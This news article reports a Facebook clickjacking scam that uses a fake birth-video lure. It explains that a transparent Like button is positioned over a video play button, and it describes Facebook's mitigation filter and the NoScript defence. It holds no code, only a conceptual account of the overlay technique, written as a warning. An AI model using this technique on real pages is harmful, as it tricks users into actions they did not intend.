New Clickjacking Attack Spreading on Facebook

Security researchers warn of a new clickjacking scam that spreads on Facebook by luring users with a video showing a baby being born.

The spam messages posted by victims of this attack read: "Baby Born Amazing Effect - WebCamera" and contains a link that takes users to a page hosted at blogspot.com.

The page displays a video player thumbnail with a play button, however, trying to click it actually forces the user's browser to Like the page.

This is achieved through a technique known as clickjacking, or in more technical terms, user interface redressing, which abuses legitimate web programming methods.

In this case, the Facebook Like button is made transparent using CSS and positioned over the play one. Therefore, when users click Play they are actually authorizing a Like action.

Because it involves abuse of legitimate technologies, clickjacking is hard to detect and block by websites and browsers alike.

Facebook has recently introduced a clickjacking mitigation filter which detects unusual click patterns for Like buttons and forces users to confirm the actions.

So far the system doesn't seem to make much of a difference, because it kicks in too late after the scam has already affected a lot of people.

"It is like a chess match in that you have a plan of attack of your own and you expect certain things from the other side, but every so often there is going to be a move that you didn't expect and then you have to step back and adapt to it," Facebook's chief security officer, Mr. Joe Sullivan, told us in a recent interview.

Firefox users can protect themselves by installing the NoScript extension. NoScript is primarily designed to implement a whitelist for JavaScript content, but can also block attacks like cross-site scripting (XSS), cross-site request forgery (CSRF) or clickjacking.